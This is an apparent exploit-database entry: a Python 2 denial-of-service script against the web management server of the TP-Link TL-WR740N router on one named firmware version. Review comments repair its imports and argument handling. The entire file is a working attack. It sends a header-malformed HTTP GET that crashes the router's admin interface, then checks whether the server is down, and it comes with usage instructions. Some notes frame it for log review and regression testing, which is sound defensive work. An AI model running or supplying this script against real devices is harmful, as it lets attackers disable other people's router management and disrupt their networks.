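# Exploit title: 150M Wireless Lite N Router HTTP DoS
# Date: 11/29/2013
# Exploit Author: Dino Caus
# Hardware Link: http://www.tp-link.com/en/products/details/?model=TL-WR740N
# Vendor Homepage: http://www.tp-link.com/
# Contact: dincaus at gmail.com
# Firmware Version: 3.12.11 Build 120320 Rel.51047n
# Description: The 150M Wireless Lite N Router exposes an HTTP server through
#              which users manage the router's settings. The request below
#              crashes that HTTP server, so the management interface becomes
#              unreachable.
# Usage: python TP_Link_DoS.py <IP> <Port>
# 150M Wireless Lite N Router, Model No. TL-WR740N / TL-WR740ND: sending an
# HTTP request with the headers inserted below in the script will crash the
# HTTP server.
#
# NOTE(review): what this request looks like on the wire, for log review and
# for regression-testing a firmware update: a GET / with the fixed headers
# "Accept-Encoding: identity", "Connection: close" and
# "User-Agent: PythonLib/2.7", and no empty line closing the header block.
# The page does not say which of these properties the crash depends on.
# Only the firmware version listed above is named as affected.
#!/usr/bin/python
# Python 2 script (urllib2). The imports were garbled in the published
# listing ("import import sys urllib2") and are restored here.

import socket
import sys
import urllib2

host = ""
port = 0

# Both <IP> and <Port> are required, so argv needs three entries; the
# published check (>= 2) let a missing port fall through to an IndexError.
if len(sys.argv) >= 3:
    host = sys.argv[1]
    port = sys.argv[2]  # kept as a string; converted with int() at connect time
else:
    print("Invalid number of the arguments.")
    print("Usage <server> <port>")
    sys.exit(1)

# Single-argument print() emits the same text under Python 2 as the original
# comma-separated print statement did.
print(" ".join(["Connecting on ", host, ":", port]))

s = socket.socket()

# Request exactly as published: request line plus four headers.
stringOfDeath = "GET / HTTP/1.1\r\n"
stringOfDeath = stringOfDeath + "Accept-Encoding: identity\r\n"
stringOfDeath = stringOfDeath + "Host: " + host + "\r\n"
stringOfDeath = stringOfDeath + "Connection: close\r\n"
stringOfDeath = stringOfDeath + "User-Agent: PythonLib/2.7\r\n"

s.connect((host, int(port)))

print("Sending packet...")
s.send(stringOfDeath)
print("Packet sent.")

# Availability check: fetch the management page with a 5 second timeout.
# NOTE(review): only socket.timeout is handled. A refused connection, or a
# timeout raised while connecting, may surface as urllib2.URLError instead
# and end the script with a traceback; confirm on the target Python 2 build.
print("Check if router http server down...")
try:
    response = urllib2.urlopen("http://" + host + ":" + port, None, 5)
    response.read()
except socket.timeout:
    print("Timeout occured, http server probaly down.")
    sys.exit(1)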